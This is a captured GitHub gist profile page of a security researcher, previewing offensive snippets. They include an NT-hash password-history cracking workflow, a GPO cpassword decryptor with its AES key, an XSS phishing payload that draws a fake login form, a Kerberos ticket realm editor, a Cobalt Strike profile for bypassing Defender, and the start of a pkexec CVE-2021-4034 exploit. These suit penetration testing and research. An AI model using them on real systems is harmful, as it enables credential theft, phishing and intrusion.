Skip to content

Instantly share code, notes, and snippets.

View tothi's full-sized avatar
:shipit:

tothi

:shipit:
603 followers · 159 following
View GitHub Profile
@tothi
tothi / PwnHistory.md
Created September 17, 2021 21:33
Combine cracked historical passwords with numbers in order to crack the current ones

Attacking user behaviour as a consequence of forced regular password change

Let's assume using ophcrack for cracking NT hashes in pwdump format where the pwdump includes password history hashes also. Assume we have cracked several hashes in the history.

Steps for getting more passwords cracked (assuming users just increase/decrease/edit numbers at the end of their passwords on regular forced password change by policy):

  1. Get cracked passwords (including history):
cat ophcrack.pwdump | grep -v ':::$' | awk -F: '{ print $7 }' | sort -u > wordlist_ophcracked.txt
@tothi
tothi / gpo-decrypt.py
Created October 10, 2021 22:56
Decrypt "cpassword" found in GPO configs
#!/usr/bin/env python3
import sys
from base64 import b64decode
from Crypto.Cipher import AES
def decrypt(cpass):
key = b'\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8' \
b'\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b'
iv = b'\x00' * 16
@tothi
tothi / xss-phisher.js
Created November 3, 2021 02:50
XSS Phishing Payload
var html = `
<div id=\"bg\" style=\"position: absolute; z-index: 100; width: 100%; height: 100%; background-color: #000000; opacity: 0.5; top: 0; left: 0; margin: 0\">
</div>
<div id=\"form\" style=\"position: absolute; z-index: 150; font-family: Arial; background-color: #ffffff; width: 280px; height: 185px; top: 50%; left: 40%; padding: 10px\">
<p>An error occurred. Please login again.</p>
<form id=\"phishingForm\"">
<p>Username <input type=\"text\" name=\"username\"></p>
<p>Password <input type=\"password\" name=\"password\"></p>
<p><input type=\"submit\" value=\"Login\"></p>
</form>
@tothi
tothi / setKerbRealm.py
Created November 25, 2021 16:46
This script modifies the unencrypted realm part of a Kerberos ticket (passed as a kirbi file) using the impacket library
#!/usr/bin/env python
#
# This script modifies the unencrypted realm part of a Kerberos ticket (passed as a kirbi file) using the impacket library
#
from pyasn1.codec.der import decoder, encoder
from impacket.krb5.asn1 import KRB_CRED, Ticket, seq_set_iter
from impacket.krb5 import types
@tothi
tothi / minimal-defender-bypass.profile
Last active August 15, 2025 09:08
Minimal Cobalt Strike C2 Profile for Bypassing Defender
# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
# as stage0, remote injecting a thread into a suspended process works
set host_stage "false";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
set sleeptime "10000";
stage {
set allocator "MapViewOfFile";
set name "notevil.dll";
@tothi
tothi / upgrade_LineageOS_with_Magisk.md
Last active March 11, 2026 13:35
Upgrading LineageOS and reinstalling Magisk

Upgrade LineageOS with Magisk

WARNING: tested only on my setup (LineageOS 18.1 on instantnoodle), other setups may break and brick the device!

Step-by-step instructions (for reinstalling patched boot.img for Magisk):

  1. upgrade LineageOS to the latest by the standard way in Android GUI (download + install + reboot)
  2. if using not the latest Magisk: wipe old (possibly hidden) Magisk app then install the up-to-date one from the official Magisk github repo
  3. install (git clone) payload_dumper from GitHub (in Termux or in an SSH session on the Android device) for the 1st time, or update (git pull) later
  4. the Android terminal session: wget the same LineageOS nightly image installed in step 1 from https://download.lineageos.org/
@tothi
tothi / blasty-vs-pkexec-mod.c
Last active July 16, 2025 04:34
CVE-2021-4034
/*
* blasty-vs-pkexec-mod.c -- by blasty <[email protected]>
* ------------------------------------------------
* PoC for CVE-2021-4034, shout out to Qualys
*
* ctf quality exploit
*
* bla bla irresponsible disclosure
*
* -- blasty // 2022-01-25
@tothi
tothi / openvpn2-dynamic-challenge-wrapper.sh
Created January 31, 2022 17:04
Wrapper script for OpenVPN version 2.x clients for supporting Dynamic Challenge (OTP) authentication
#!/bin/bash
#
# openvpn2 wrapper for supporting Dynamic Challenge (in openvpn 2.x)
#
# Dynamic Challenge:
# CRV1:<FLAGS>:<STATE_ID>:<BASE64_USERNAME>:<CHALLENGE_TEXT>
# Dynamic Challenge response:
# Username: [username decoded from challenge, probably equals to the original username]
# Password: CRV1::<STATE_ID>::<RESPONSE_TEXT>
@tothi
tothi / ip_to_geo_map.md
Last active March 6, 2022 13:48
Draw geolocation map from list of IP addresses

Creating geolocation heatmap from a list of IP addresses

Source IP set is proxies.txt.

Generate KML with geolocation coordinates using the tool geoiplookup from MaxMind (free db from MaxMind may be needed):

cat proxies.txt | \
  awk '{ cmd="/usr/bin/geoiplookup "$1" | tr '\''\n'\'' '\''|'\''"; 
         cmd | getline res; print $1"|"res; close(cmd) }' \
 &gt; proxies_geo.csv
@tothi
tothi / magisk_ramdisk_patch_avd.sh
Last active April 9, 2026 12:11
Apply Magisk patches on AVD (Android Emulator) RAMDISK images for running Magisk (root) on Android Emulators
#!/bin/bash
#
# patch ramdisk.img (for installing Magisk on x64 Android emulator)
#
# x86_64 on Android 12 (API Level 32) is supported/tested currently
#
# install AVD:
#
# sudo sdkmanager 'system-images;android-32;google_apis_playstore;x86_64'